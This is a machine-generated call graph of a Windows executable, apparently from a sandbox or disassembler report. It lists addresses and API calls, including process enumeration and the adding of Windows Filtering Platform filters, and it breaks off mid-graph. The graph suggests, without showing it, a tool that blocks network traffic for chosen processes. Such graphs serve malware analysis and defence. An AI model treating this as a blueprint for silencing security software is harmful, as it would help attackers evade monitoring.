7ff64b931208 SetUnhandledExceptionFilter 9047->9048 9050 7ff64b93a989 9047->9050 9048->9038 9049 7ff64b93ab8f 9049->9048 9052 7ff64b93abb7 VirtualProtect 9049->9052 9050->9049 9051 7ff64b93aa00 9050->9051 9053 7ff64b93aa3f 9050->9053 9051->9049 9054 7ff64b93aa1e 9051->9054 9052->9049 9053->9049 9056 7ff64b93aaaa 9053->9056 9054->9051 9062 7ff64b93a824 9054->9062 9057 7ff64b93a824 3 API calls 9056->9057 9057->9053 9059 7ff64b9314c8 9058->9059 9069 7ff64b931486 9059->9069 9063 7ff64b93a84a 9062->9063 9064 7ff64b93a8af VirtualQuery 9063->9064 9068 7ff64b93a953 9063->9068 9065 7ff64b93a8d8 9064->9065 9066 7ff64b93a907 VirtualProtect 9065->9066 9065->9068 9067 7ff64b93a93f GetLastError 9066->9067 9066->9068 9067->9068 9068->9054 9076 7ff64b931360 9069->9076 9072 7ff64b931496 9095 7ff64b931432 9072->9095 9126 7ff64b9319c0 GetModuleHandleExA 9076->9126 9081 7ff64b931393 9141 7ff64b93168c InitializeCriticalSectionAndSpinCount 9081->9141 9085 7ff64b9319c0 8 API calls 9086 7ff64b9313cb 9085->9086 9087 7ff64b936c99 12 API calls 9086->9087 9088 7ff64b9313e7 9087->9088 9188 7ff64b936497 9088->9188 9091 7ff64b9313f6 9094 7ff64b9313a1 9091->9094 9194 7ff64b9397f2 9091->9194 9094->9072 9103 7ff64b939621 9094->9103 9369 7ff64b93193c 9095->9369 9098 7ff64b931446 9376 7ff64b936263 9098->9376 9099 7ff64b931452 9100 7ff64b93145e GetProcessHeap HeapFree 9099->9100 9101 7ff64b931475 9099->9101 9100->9101 9101->9044 9104 7ff64b939650 9103->9104 9105 7ff64b939656 9104->9105 9106 7ff64b9396b0 9104->9106 9390 7ff64b9376d0 9105->9390 9107 7ff64b9314e2 6 API calls 9106->9107 9110 7ff64b9396c6 9107->9110 9110->9072 9111 7ff64b93966e 9112 7ff64b939672 9111->9112 9114 7ff64b939d2d 7 API calls 9111->9114 9115 7ff64b9396fc FwpmEngineClose0 9112->9115 9404 7ff64b939d2d 9112->9404 9113 7ff64b9376d0 8 API calls 9113->9111 9116 7ff64b9396ef 9114->9116 9115->9110 9116->9115 9118 7ff64b939722 9116->9118 9414 7ff64b93855d 9116->9414 9118->9115 9121 7ff64b939d2d 7 API calls 9118->9121 9120 7ff64b9396ac 9120->9115 9123 7ff64b939737 9121->9123 9123->9112 9123->9115 9440 7ff64b938cfc 9123->9440 9127 7ff64b931376 9126->9127 9128 7ff64b9319f2 GetLastError 9126->9128 9130 7ff64b936c99 9127->9130 9242 7ff64b9314e2 9128->9242 9131 7ff64b936cdf 9130->9131 9132 7ff64b936caf 9130->9132 9133 7ff64b9314e2 6 API calls 9131->9133 9285 7ff64b936b9b 9132->9285 9140 7ff64b93138f 9133->9140 9136 7ff64b936d0f strlen 9137 7ff64b936d37 strcat strlen 9136->9137 9138 7ff64b936d21 9136->9138 9137->9140 9138->9137 9139 7ff64b936d26 strlen 9138->9139 9139->9137 9140->9081 9165 7ff64b935e6f 9140->9165 9142 7ff64b9316ba 9141->9142 9143 7ff64b9317e0 GetLastError 9141->9143 9145 7ff64b9319c0 8 API calls 9142->9145 9144 7ff64b9314e2 6 API calls 9143->9144 9153 7ff64b9317b9 9144->9153 9146 7ff64b9316d6 9145->9146 9147 7ff64b936b9b 8 API calls 9146->9147 9148 7ff64b9316ea 9147->9148 9149 7ff64b9316f4 strlen 9148->9149 9148->9153 9151 7ff64b93170d 9149->9151 9152 7ff64b931723 9149->9152 9150 7ff64b9314e2 6 API calls 9154 7ff64b93139d 9150->9154 9151->9152 9155 7ff64b931712 strlen 9151->9155 9156 7ff64b931748 strlen fopen 9152->9156 9157 7ff64b931728 strcat strlen 9152->9157 9153->9150 9154->9085 9154->9094 9155->9152 9158 7ff64b931797 9156->9158 9159 7ff64b9318ad 9156->9159 9157->9156 9161 7ff64b9314e2 6 API calls 9158->9161 9160 7ff64b9314e2 6 API calls 9159->9160 9160->9153 9162 7ff64b9317b1 9161->9162 9162->9153 9163 7ff64b93191d 9162->9163 9164 7ff64b9314e2 6 API calls 9163->9164 9164->9154 9166 7ff64b935e86 9165->9166 9167 7ff64b935f72 9165->9167 9169 7ff64b935e8f CreateFileA 9166->9169 9170 7ff64b935fa2 9166->9170 9168 7ff64b9314e2 6 API calls 9167->9168 9178 7ff64b935f27 9168->9178 9172 7ff64b935eda LockFileEx 9169->9172 9173 7ff64b935fd5 GetLastError 9169->9173 9171 7ff64b9314e2 6 API calls 9170->9171 9171->9178 9175 7ff64b9360ba GetLastError 9172->9175 9176 7ff64b935f0e 9172->9176 9174 7ff64b9314e2 6 API calls 9173->9174 9185 7ff64b935ff6 9174->9185 9177 7ff64b9314e2 6 API calls 9175->9177 9176->9178 9179 7ff64b93622b CloseHandle 9176->9179 9186 7ff64b9360db 9177->9186 9180 7ff64b936239 9178->9180 9181 7ff64b935f51 9178->9181 9179->9180 9182 7ff64b9314e2 6 API calls 9180->9182 9183 7ff64b9314e2 6 API calls 9181->9183 9184 7ff64b935f67 9182->9184 9183->9184 9184->9081 9185->9175 9187 7ff64b936163 9185->9187 9186->9187 9187->9179 9189 7ff64b9364a0 GetFileAttributesA 9188->9189 9190 7ff64b9364b5 9188->9190 9191 7ff64b9364e5 GetLastError 9189->9191 9193 7ff64b9313ef 9189->9193 9192 7ff64b9314e2 6 API calls 9190->9192 9191->9193 9192->9193 9193->9091 9216 7ff64b93433b 9193->9216 9195 7ff64b93981a 9194->9195 9196 7ff64b9398a5 9194->9196 9313 7ff64b9345d5 9195->9313 9197 7ff64b9314e2 6 API calls 9196->9197 9212 7ff64b939833 9197->9212 9199 7ff64b93983d GetProcessHeap HeapFree 9200 7ff64b939854 9199->9200 9201 7ff64b939b92 9200->9201 9207 7ff64b93987c 9200->9207 9202 7ff64b9314e2 6 API calls 9201->9202 9206 7ff64b939bb4 9202->9206 9203 7ff64b93995d GetProcessHeap HeapAlloc 9204 7ff64b93999a 9203->9204 9205 7ff64b9399d0 9203->9205 9204->9212 9213 7ff64b939ab3 strncpy strncpy 9204->9213 9214 7ff64b939b28 strncpy 9204->9214 9209 7ff64b9314e2 6 API calls 9205->9209 9215 7ff64b9314e2 6 API calls 9206->9215 9210 7ff64b9314e2 6 API calls 9207->9210 9209->9204 9211 7ff64b939892 9210->9211 9211->9094 9212->9199 9212->9200 9213->9204 9214->9204 9215->9206 9217 7ff64b93435a 9216->9217 9218 7ff64b9343e5 9216->9218 9219 7ff64b934415 9217->9219 9220 7ff64b934363 fopen 9217->9220 9221 7ff64b9314e2 6 API calls 9218->9221 9222 7ff64b9314e2 6 API calls 9219->9222 9223 7ff64b934448 _errno 9220->9223 9224 7ff64b934374 9220->9224 9226 7ff64b934388 9221->9226 9222->9226 9225 7ff64b9314e2 6 API calls 9223->9225 9224->9226 9227 7ff64b9344d6 fwrite 9224->9227 9228 7ff64b934470 _errno 9225->9228 9229 7ff64b93459a 9226->9229 9234 7ff64b9343bb 9226->9234 9230 7ff64b9344f8 _errno 9227->9230 9231 7ff64b9344ee 9227->9231 9232 7ff64b934479 9228->9232 9233 7ff64b9344bd _errno 9228->9233 9236 7ff64b9314e2 6 API calls 9229->9236 9235 7ff64b9314e2 6 API calls 9230->9235 9231->9230 9232->9233 9233->9227 9237 7ff64b9314e2 6 API calls 9234->9237 9238 7ff64b934520 _errno 9235->9238 9239 7ff64b9343d8 9236->9239 9237->9239 9240 7ff64b934529 9238->9240 9241 7ff64b93456d _errno 9238->9241 9239->9091 9240->9241 9241->9229 9243 7ff64b9314f0 9242->9243 9253 7ff64b93b210 9243->9253 9246 7ff64b931577 fwrite fflush 9248 7ff64b9315a0 9246->9248 9247 7ff64b9315ac EnterCriticalSection 9249 7ff64b9315c6 LeaveCriticalSection 9247->9249 9250 7ff64b9315e3 9247->9250 9248->9127 9249->9246 9251 7ff64b93161d CopyFileA 9250->9251 9252 7ff64b931655 9251->9252 9252->9249 9254 7ff64b93b21e 9253->9254 9255 7ff64b93b235 9253->9255 9259 7ff64b93c2d0 9254->9259 9257 7ff64b93c2d0 fputc 9255->9257 9258 7ff64b931549 9257->9258 9258->9246 9258->9247 9258->9248 9261 7ff64b93c307 9259->9261 9260 7ff64b93ca67 9260->9258 9261->9260 9262 7ff64b93b3e7 fputc 9261->9262 9265 7ff64b93bbb4 9261->9265 9273 7ff64b93b9b0 9261->9273 9262->9261 9268 7ff64b93bbe6 9265->9268 9266 7ff64b93bd06 9267 7ff64b93bd86 9266->9267 9269 7ff64b93b3e7 fputc 9266->9269 9270 7ff64b93bda2 9267->9270 9271 7ff64b93b3e7 fputc 9267->9271 9268->9266 9281 7ff64b93b3e7 9268->9281 9269->9266 9270->9261 9271->9267 9274 7ff64b93ba02 9273->9274 9275 7ff64b93b3e7 fputc 9274->9275 9279 7ff64b93bb66 9274->9279 9275->9274 9276 7ff64b93b3e7 fputc 9276->9279 9277 7ff64b93bba6 9277->9261 9278 7ff64b93bb7f 9278->9277 9280 7ff64b93b3e7 fputc 9278->9280 9279->9276 9279->9278 9280->9278 9282 7ff64b93b3f8 9281->9282 9283 7ff64b93b410 9282->9283 9284 7ff64b93b409 fputc 9282->9284 9283->9268 9284->9283 9286 7ff64b936bac 9285->9286 9287 7ff64b936be2 9285->9287 9288 7ff64b936bb1 9286->9288 9289 7ff64b936c12 9286->9289 9290 7ff64b9314e2 6 API calls 9287->9290 9291 7ff64b936bba 9288->9291 9292 7ff64b936c42 9288->9292 9293 7ff64b9314e2 6 API calls 9289->9293 9296 7ff64b936bc7 9290->9296 9298 7ff64b936a5c 9291->9298 9294 7ff64b9314e2 6 API calls 9292->9294 9293->9296 9294->9296 9296->9136 9296->9140 9299 7ff64b936a76 9298->9299 9300 7ff64b936b05 9298->9300 9302 7ff64b936a7f 9299->9302 9303 7ff64b936b35 9299->9303 9301 7ff64b9314e2 6 API calls 9300->9301 9311 7ff64b936ac1 9301->9311 9304 7ff64b936b68 9302->9304 9305 7ff64b936a88 GetModuleFileNameA GetLastError 9302->9305 9306 7ff64b9314e2 6 API calls 9303->9306 9308 7ff64b9314e2 6 API calls 9304->9308 9307 7ff64b936aa2 9305->9307 9306->9311 9309 7ff64b936afa 9307->9309 9310 7ff64b9314e2 6 API calls 9307->9310 9308->9311 9309->9296 9310->9311 9312 7ff64b9314e2 6 API calls 9311->9312 9312->9309 9314 7ff64b934675 9313->9314 9315 7ff64b9345f7 9313->9315 9316 7ff64b9314e2 6 API calls 9314->9316 9317 7ff64b9346ba 9315->9317 9318 7ff64b934600 9315->9318 9330 7ff64b9346b0 9316->9330 9319 7ff64b9314e2 6 API calls 9317->9319 9320 7ff64b934610 fopen 9318->9320 9323 7ff64b9346ed 9318->9323 9319->9330 9321 7ff64b93462b fseek 9320->9321 9322 7ff64b934720 _errno 9320->9322 9325 7ff64b934646 _errno 9321->9325 9326 7ff64b9347f3 9321->9326 9324 7ff64b9314e2 6 API calls 9322->9324 9327 7ff64b9314e2 6 API calls 9323->9327 9328 7ff64b934742 _errno 9324->9328 9329 7ff64b9314e2 6 API calls 9325->9329 9336 7ff64b93482b _errno 9326->9336 9337 7ff64b934802 9326->9337 9327->9330 9331 7ff64b93474b 9328->9331 9332 7ff64b93478f _errno 9328->9332 9333 7ff64b934668 _errno 9329->9333 9334 7ff64b9314e2 6 API calls 9330->9334 9331->9332 9362 7ff64b93481e 9332->9362 9333->9314 9335 7ff64b9347da _errno 9333->9335 9350 7ff64b934b78 9334->9350 9335->9362 9340 7ff64b9314e2 6 API calls 9336->9340 9342 7ff64b9348b3 fseek 9337->9342 9337->9362 9338 7ff64b934b2d fclose 9339 7ff64b934b35 9338->9339 9339->9330 9341 7ff64b934ba2 9339->9341 9343 7ff64b93484d _errno 9340->9343 9348 7ff64b9314e2 6 API calls 9341->9348 9346 7ff64b9348cd 9342->9346 9347 7ff64b934941 _errno 9342->9347 9344 7ff64b934856 9343->9344 9345 7ff64b93489a _errno 9343->9345 9344->9345 9345->9362 9349 7ff64b9349c9 GetProcessHeap HeapAlloc 9346->9349 9367 7ff64b9348df 9346->9367 9351 7ff64b9314e2 6 API calls 9347->9351 9348->9350 9352 7ff64b9349f1 9349->9352 9349->9367 9350->9203 9350->9212 9353 7ff64b934963 _errno 9351->9353 9354 7ff64b9314e2 6 API calls 9352->9354 9355 7ff64b93496c 9353->9355 9356 7ff64b9349b0 _errno 9353->9356 9357 7ff64b934a07 9354->9357 9355->9356 9356->9362 9357->9367 9358 7ff64b934a9e 9360 7ff64b934aa9 9358->9360 9361 7ff64b9314e2 6 API calls 9358->9361 9359 7ff64b93490d fread 9359->9358 9359->9367 9360->9362 9364 7ff64b934ab4 GetProcessHeap HeapFree 9360->9364 9361->9360 9362->9338 9362->9339 9363 7ff64b934a0c _errno 9365 7ff64b9314e2 6 API calls 9363->9365 9364->9362 9366 7ff64b934a2e _errno 9365->9366 9366->9367 9368 7ff64b934a7b _errno 9366->9368 9367->9358 9367->9359 9367->9362 9367->9363 9367->9368 9368->9367 9370 7ff64b931956 fclose 9369->9370 9371 7ff64b93195b 9369->9371 9370->9371 9372 7ff64b931989 9371->9372 9373 7ff64b931983 DeleteCriticalSection 9371->9373 9374 7ff64b9314e2 6 API calls 9372->9374 9373->9372 9375 7ff64b93143c 9374->9375 9375->9098 9375->9099 9377 7ff64b9362e4 9376->9377 9378 7ff64b936272 9376->9378 9381 7ff64b9314e2 6 API calls 9377->9381 9379 7ff64b93627f UnlockFileEx 9378->9379 9380 7ff64b936315 9378->9380 9382 7ff64b9362b9 CloseHandle 9379->9382 9383 7ff64b936372 GetLastError 9379->9383 9384 7ff64b9314e2 6 API calls 9380->9384 9389 7ff64b93630d 9381->9389 9386 7ff64b9314e2 6 API calls 9382->9386 9385 7ff64b9314e2 6 API calls 9383->9385 9384->9389 9385->9389 9387 7ff64b9362d8 9386->9387 9387->9099 9388 7ff64b9314e2 6 API calls 9388->9387 9389->9388 9391 7ff64b937785 9390->9391 9392 7ff64b937789 9391->9392 9393 7ff64b9377cd 9391->9393 9395 7ff64b9377ea 9392->9395 9397 7ff64b9377c6 9392->9397 9394 7ff64b9314e2 6 API calls 9393->9394 9396 7ff64b9377e3 9394->9396 9398 7ff64b9314e2 6 API calls 9395->9398 9396->9111 9396->9113 9399 7ff64b937800 9397->9399 9401 7ff64b937865 wcscmp 9397->9401 9398->9399 9400 7ff64b937817 FwpmProviderDestroyEnumHandle0 9399->9400 9400->9396 9402 7ff64b93788a 9400->9402 9401->9397 9402->9396 9403 7ff64b9314e2 6 API calls 9402->9403 9403->9396 9466 7ff64b939bb9 9404->9466 9407 7ff64b939537 9408 7ff64b939bb9 7 API calls 9407->9408 9410 7ff64b939566 9408->9410 9409 7ff64b93960d 9409->9120 9410->9409 9413 7ff64b9314e2 6 API calls 9410->9413 9483 7ff64b93a1f1 9410->9483 9489 7ff64b93929a inet_addr ntohl 9410->9489 9413->9410 9415 7ff64b939bb9 7 API calls 9414->9415 9416 7ff64b938599 9415->9416 9417 7ff64b9385dc 9416->9417 9418 7ff64b9386c1 GetLastError 9416->9418 9424 7ff64b9386df 9416->9424 9420 7ff64b9387a3 GetLastError 9417->9420 9439 7ff64b93860e 9417->9439 9419 7ff64b9314e2 6 API calls 9418->9419 9419->9424 9421 7ff64b9387b4 9420->9421 9420->9439 9423 7ff64b9314e2 6 API calls 9421->9423 9422 7ff64b938ca5 CloseHandle 9422->9424 9423->9439 9424->9118 9425 7ff64b93a1f1 11 API calls 9425->9439 9426 7ff64b9388cd OpenProcess 9427 7ff64b938a78 GetLastError 9426->9427 9428 7ff64b9388ee QueryFullProcessImageNameW 9426->9428 9432 7ff64b9314e2 6 API calls 9427->9432 9430 7ff64b93892e GetLastError 9428->9430 9428->9439 9429 7ff64b938669 Process32Next 9431 7ff64b93867d GetLastError 9429->9431 9429->9439 9433 7ff64b9314e2 6 API calls 9430->9433 9431->9439 9432->9439 9433->9439 9435 7ff64b9314e2 6 API calls 9435->9439 9436 7ff64b938a13 CloseHandle 9436->9439 9437 7ff64b9386af 9437->9436 9438 7ff64b9314e2 6 API calls 9437->9438 9438->9437 9439->9422 9439->9425 9439->9426 9439->9429 9439->9435 9439->9436 9439->9437 9533 7ff64b938153 9439->9533 9441 7ff64b939bb9 7 API calls 9440->9441 9442 7ff64b938d38 9441->9442 9451 7ff64b939257 9442->9451 9596 7ff64b931cf4 9442->9596 9445 7ff64b938d82 9447 7ff64b938d8a 9445->9447 9449 7ff64b931c73 8 API calls 9445->9449 9448 7ff64b938da9 FreeLibrary 9447->9448 9447->9451 9448->9451 9450 7ff64b938dc6 9449->9450 9450->9451 9452 7ff64b931c73 8 API calls 9450->9452 9451->9112 9453 7ff64b938de3 9452->9453 9453->9451 9454 7ff64b931c73 8 API calls 9453->9454 9455 7ff64b938e00 9454->9455 9455->9451 9456 7ff64b931c73 8 API calls 9455->9456 9463 7ff64b938e18 9456->9463 9457 7ff64b93a1f1 11 API calls 9457->9463 9458 7ff64b938ecc strlen 9458->9463 9459 7ff64b938f64 GetProcessHeap HeapAlloc 9459->9463 9460 7ff64b938fb2 BuildTrusteeWithSidW BuildSecurityDescriptorW 9460->9463 9461 7ff64b9314e2 6 API calls 9461->9463 9463->9447 9463->9451 9463->9457 9463->9458 9463->9459 9463->9460 9463->9461 9464 7ff64b9390f2 GetProcessHeap HeapFree 9463->9464 9465 7ff64b9391dc LocalFree 9463->9465 9612 7ff64b93795a GetProcessHeap HeapAlloc 9463->9612 9464->9463 9465->9463 9467 7ff64b939bec 9466->9467 9468 7ff64b939bd1 9466->9468 9471 7ff64b9314e2 6 API calls 9467->9471 9469 7ff64b939bd6 9468->9469 9470 7ff64b939c1f 9468->9470 9472 7ff64b939c52 9469->9472 9474 7ff64b939bdb 9469->9474 9473 7ff64b9314e2 6 API calls 9470->9473 9475 7ff64b939c15 9471->9475 9476 7ff64b9314e2 6 API calls 9472->9476 9473->9475 9477 7ff64b939cbc 9474->9477 9479 7ff64b939c91 strcmp 9474->9479 9481 7ff64b9314e2 6 API calls 9475->9481 9476->9475 9477->9475 9478 7ff64b939cc3 9477->9478 9480 7ff64b9314e2 6 API calls 9478->9480 9479->9474 9482 7ff64b939689 9480->9482 9481->9482 9482->9115 9482->9120 9482->9407 9484 7ff64b93a22c 9483->9484 9485 7ff64b93a200 9483->9485 9487 7ff64b9314e2 6 API calls 9484->9487 9496 7ff64b93a0f0 9485->9496 9488 7ff64b93a217 9487->9488 9488->9410 9490 7ff64b93932b 9489->9490 9492 7ff64b93937a 9489->9492 9491 7ff64b93934f 9490->9491 9494 7ff64b9314e2 6 API calls 9490->9494 9491->9410 9493 7ff64b9314e2 6 API calls 9492->9493 9495 7ff64b93952d 9493->9495 9494->9491 9497 7ff64b93a153 9496->9497 9498 7ff64b93a112 9496->9498 9500 7ff64b9314e2 6 API calls 9497->9500 9508 7ff64b939ed0 9498->9508 9502 7ff64b93a12b 9500->9502 9502->9488 9503 7ff64b93a183 _errno 9504 7ff64b940568 9503->9504 9505 7ff64b93a1a5 _errno 9504->9505 9505->9502 9506 7ff64b93a1b4 _errno 9505->9506 9507 7ff64b9314e2 6 API calls 9506->9507 9507->9502 9509 7ff64b939f19 9508->9509 9510 7ff64b939ee1 9508->9510 9512 7ff64b9314e2 6 API calls 9509->9512 9511 7ff64b939bb9 7 API calls 9510->9511 9513 7ff64b939ef4 9511->9513 9515 7ff64b939ef8 9512->9515 9513->9515 9516 7ff64b939d40 9513->9516 9515->9502 9515->9503 9517 7ff64b939d58 9516->9517 9518 7ff64b939d73 9516->9518 9519 7ff64b939da6 9517->9519 9520 7ff64b939d5d 9517->9520 9521 7ff64b9314e2 6 API calls 9518->9521 9523 7ff64b9314e2 6 API calls 9519->9523 9522 7ff64b939dd9 9520->9522 9528 7ff64b939d62 9520->9528 9530 7ff64b939d9c 9521->9530 9524 7ff64b9314e2 6 API calls 9522->9524 9523->9530 9524->9530 9525 7ff64b939e3b 9527 7ff64b939e44 9525->9527 9525->9530 9526 7ff64b939e18 strcmp 9526->9528 9529 7ff64b9314e2 6 API calls 9527->9529 9528->9525 9528->9526 9531 7ff64b939e69 9529->9531 9532 7ff64b9314e2 6 API calls 9530->9532 9531->9515 9532->9531 9556 7ff64b938008 GetFileAttributesW 9533->9556 9536 7ff64b938192 wcslen 9573 7ff64b937102 9536->9573 9539 7ff64b9382b9 FwpmFilterAdd0 9543 7ff64b938461 9539->9543 9544 7ff64b9384ce FwpmFilterAdd0 9539->9544 9540 7ff64b938239 FwpmFilterDeleteByKey0 9541 7ff64b938277 FwpmFilterDeleteByKey0 9540->9541 9542 7ff64b93825a 9540->9542 9549 7ff64b93829c 9541->9549 9553 7ff64b938182 9541->9553 9548 7ff64b9314e2 6 API calls 9542->9548 9545 7ff64b9314e2 6 API calls 9543->9545 9546 7ff64b938474 9544->9546 9547 7ff64b938540 9544->9547 9545->9546 9550 7ff64b93848a GetProcessHeap HeapFree 9546->9550 9551 7ff64b9384a1 9546->9551 9552 7ff64b9314e2 6 API calls 9547->9552 9548->9553 9554 7ff64b9314e2 6 API calls 9549->9554 9550->9551 9551->9553 9555 7ff64b9384b2 GetProcessHeap HeapFree 9551->9555 9552->9546 9553->9439 9554->9553 9555->9553 9557 7ff64b938149 9556->9557 9558 7ff64b938028 9556->9558 9579 7ff64b937e04 9558->9579 9560 7ff64b93803b 9561 7ff64b93804f GetProcessHeap HeapAlloc 9560->9561 9570 7ff64b938041 9560->9570 9562 7ff64b9380d9 9561->9562 9566 7ff64b938071 9561->9566 9564 7ff64b9314e2 6 API calls 9562->9564 9563 7ff64b93807b wcslen GetProcessHeap HeapAlloc 9565 7ff64b9380f7 9563->9565 9572 7ff64b9380bb 9563->9572 9564->9566 9569 7ff64b9314e2 6 API calls 9565->9569 9566->9563 9566->9570 9567 7ff64b9380c7 memcpy 9567->9570 9568 7ff64b93810f 9568->9570 9571 7ff64b938114 GetProcessHeap HeapFree 9568->9571 9569->9572 9570->9536 9570->9553 9571->9570 9572->9567 9572->9568 9574 7ff64b93711d 9573->9574 9575 7ff64b93710b 9573->9575 9576 7ff64b9314e2 6 API calls 9574->9576 9577 7ff64b9314e2 6 API calls 9575->9577 9578 7ff64b937110 9575->9578 9576->9578 9577->9578 9578->9539 9578->9540 9580 7ff64b937e59 9579->9580 9581 7ff64b937e6f QueryDosDeviceW 9580->9581 9586 7ff64b937e5f 9580->9586 9582 7ff64b937f6c 9581->9582 9583 7ff64b937e90 GetLastError 9581->9583 9587 7ff64b937de7 9582->9587 9584 7ff64b9314e2 6 API calls 9583->9584 9584->9586 9586->9560 9590 7ff64b93b270 9587->9590 9591 7ff64b93b27e 9590->9591 9592 7ff64b93b295 9590->9592 9593 7ff64b93dadd fputwc fwprintf strlen _errno strerror 9591->9593 9594 7ff64b93dadd fputwc fwprintf strlen _errno strerror 9592->9594 9595 7ff64b937dff 9593->9595 9594->9595 9595->9586 9597 7ff64b931d2b 9596->9597 9598 7ff64b931d02 LoadLibraryA 9596->9598 9599 7ff64b931d2e GetLastError 9597->9599 9598->9599 9600 7ff64b931d10 9598->9600 9602 7ff64b9314e2 6 API calls 9599->9602 9601 7ff64b9314e2 6 API calls 9600->9601 9603 7ff64b931d29 9601->9603 9602->9603 9603->9445 9604 7ff64b931c73 9603->9604 9605 7ff64b931c90 GetProcAddress 9604->9605 9606 7ff64b931cc1 9604->9606 9607 7ff64b931cc6 GetLastError 9605->9607 9608 7ff64b931ca1 9605->9608 9606->9607 9610 7ff64b9314e2 6 API calls 9607->9610 9609 7ff64b9314e2 6 API calls 9608->9609 9611 7ff64b931cbf 9609->9611 9610->9611 9611->9445 9613 7ff64b9379a1 9612->9613 9614 7ff64b937c4f 9612->9614 9616 7ff64b937102 6 API calls 9613->9616 9615 7ff64b9314e2 6 API calls 9614->9615 9623 7ff64b937c3b 9615->9623 9617 7ff64b9379b1 9616->9617 9618 7ff64b937c6c FwpmFilterDeleteByKey0 9617->9618 9621 7ff64b937a46 9617->9621 9619 7ff64b937ca7 FwpmFilterDeleteByKey0 9618->9619 9620 7ff64b937c8d 9618->9620 9619->9623 9624 7ff64b937cd2 9619->9624 9622 7ff64b9314e2 6 API calls 9620->9622 9625 7ff64b937b20 FwpmFilterAdd0 9621->9625 9622->9623 9623->9463 9626 7ff64b9314e2 6 API calls 9624->9626 9627 7ff64b937c07 9625->9627 9628 7ff64b937cef FwpmFilterAdd0 9625->9628 9626->9623 9629 7ff64b9314e2 6 API calls 9627->9629 9630 7ff64b937d5d 9628->9630 9631 7ff64b937c1a 9629->9631 9632 7ff64b9314e2 6 API calls 9630->9632 9631->9623 9633 7ff64b937c24 GetProcessHeap HeapFree 9631->9633 9634 7ff64b937d7a 9632->9634 9633->9623 9868 7ff64b9358fa 9873 7ff64b935189 9868->9873 9871 7ff64b93590f 9874 7ff64b935219 CopyFileA 9873->9874 9875 7ff64b9351b1 9873->9875 9874->9875 9876 7ff64b935242 GetLastError 9874->9876 9879 7ff64b9351e8 9875->9879 9883 7ff64b93526c 9875->9883 9877 7ff64b9314e2 6 API calls 9876->9877 9877->9883 9878 7ff64b9314e2 6 API calls 9880 7ff64b9353ba 9878->9880 9881 7ff64b9314e2 6 API calls 9879->9881 9880->9880 9882 7ff64b935209 9881->9882 9882->9871 9884 7ff64b934bbd 9882->9884 9883->9878 9885 7ff64b934bd4 DeleteFileA 9884->9885 9893 7ff64b934bde 9884->9893 9886 7ff64b934c2b GetLastError 9885->9886 9885->9893 9887 7ff64b9314e2 6 API calls 9886->9887 9887->9893 9888 7ff64b934d5a 9890 7ff64b9314e2 6 API calls 9888->9890 9889 7ff64b934c0a 9891 7ff64b9314e2 6 API calls 9889->9891 9892 7ff64b934d7c 9890->9892 9894 7ff64b934c20 9891->9894 9892->9892 9893->9888 9893->9889 9894->9871 10463 7ff64b931001 10464 7ff64b93103c __set_app_type 10463->10464 10466 7ff64b9310a9 10464->10466 11324 7ff64b93c600 11325 7ff64b93c616 11324->11325 11332 7ff64b93c1ae 11325->11332 11327 7ff64b93ca67 11328 7ff64b93b3e7 fputc 11329 7ff64b93c382 11328->11329 11329->11327 11329->11328 11330 7ff64b93b9b0 fputc 11329->11330 11331 7ff64b93bbb4 fputc 11329->11331 11330->11329 11331->11329 11333 7ff64b93c1c0 11332->11333 11334 7ff64b93b2d0 6 API calls 11333->11334 11335 7ff64b93c1f8 11334->11335 11336 7ff64b93c20d 11335->11336 11337 7ff64b93c21f 11335->11337 11339 7ff64b93b5da fputc 11336->11339 11338 7ff64b93c290 11337->11338 11340 7ff64b93c235 11337->11340 11341 7ff64b93c29b strlen 11338->11341 11342 7ff64b93c294 11338->11342 11343 7ff64b93c21a 11339->11343 11344 7ff64b93c239 11340->11344 11345 7ff64b93c241 strlen 11340->11345 11341->11342 11350 7ff64b93c08a 11342->11350 11343->11329 11347 7ff64b93b721 11 API calls 11344->11347 11345->11344 11348 7ff64b93c274 11347->11348 11348->11343 11349 7ff64b93b3e7 fputc 11348->11349 11349->11348 11351 7ff64b93c0ac 11350->11351 11352 7ff64b93b721 11 API calls 11351->11352 11353 7ff64b93c0f7 11352->11353 11354 7ff64b93b3e7 fputc 11353->11354 11355 7ff64b93c118 11354->11355 10467 7ff64b93dc0b 10468 7ff64b93ccd9 2 API calls 10467->10468 10472 7ff64b93db86 10468->10472 10469 7ff64b93e2e0 10470 7ff64b93e301 10469->10470 10471 7ff64b93ccd9 2 API calls 10469->10471 10471->10470 10472->10469 10473 7ff64b93ccd9 fputwc fwprintf 10472->10473 10474 7ff64b93dcdd strerror 10472->10474 10473->10472 10475 7ff64b93cfc8 strlen 10474->10475 10475->10472 9903 7ff64b93ad0e 9904 7ff64b93ad13 signal 9903->9904 9905 7ff64b93ad25 signal 9904->9905 9906 7ff64b93aca1 9904->9906 9905->9906 10755 7ff64b93de59 10756 7ff64b93de6f 10755->10756 10765 7ff64b93d9bb 10756->10765 10758 7ff64b93e2e0 10759 7ff64b93e301 10758->10759 10760 7ff64b93ccd9 2 API calls 10758->10760 10760->10759 10761 7ff64b93ccd9 fputwc fwprintf 10762 7ff64b93db86 10761->10762 10762->10758 10762->10761 10763 7ff64b93dcdd strerror 10762->10763 10764 7ff64b93cfc8 strlen 10763->10764 10764->10762 10766 7ff64b93d9cd 10765->10766 10783 7ff64b93d00f 10766->10783 10769 7ff64b93da2c 10772 7ff64b93da9d 10769->10772 10773 7ff64b93da42 10769->10773 10770 7ff64b93da1a 10787 7ff64b93cc00 10770->10787 10774 7ff64b93daa8 strlen 10772->10774 10775 7ff64b93daa1 10772->10775 10776 7ff64b93da46 10773->10776 10777 7ff64b93da4e strlen 10773->10777 10774->10775 10811 7ff64b93d897 10775->10811 10791 7ff64b93cdd0 10776->10791 10777->10776 10779 7ff64b93da27 10779->10762 10781 7ff64b93da81 10781->10779 10782 7ff64b93ca90 fputwc 10781->10782 10782->10781 10784 7ff64b93d02d 10783->10784 10817 7ff64b93e4e0 10784->10817 10788 7ff64b93cc16 10787->10788 10788->10788 10789 7ff64b93cacd 10 API calls 10788->10789 10790 7ff64b93cc6c 10789->10790 10790->10779 10792 7ff64b93cdec 10791->10792 10793 7ff64b93ce3d 10792->10793 10796 7ff64b93ca90 fputwc 10792->10796 10794 7ff64b93ceda 10793->10794 10795 7ff64b93ca90 fputwc 10793->10795 10797 7ff64b93cee0 10794->10797 10799 7ff64b93ca90 fputwc 10794->10799 10795->10794 10796->10792 10798 7ff64b93cee9 10797->10798 10805 7ff64b93cf16 10797->10805 10801 7ff64b93ca90 fputwc 10798->10801 10799->10794 10800 7ff64b93ca90 fputwc 10800->10805 10802 7ff64b93cf6b 10801->10802 10809 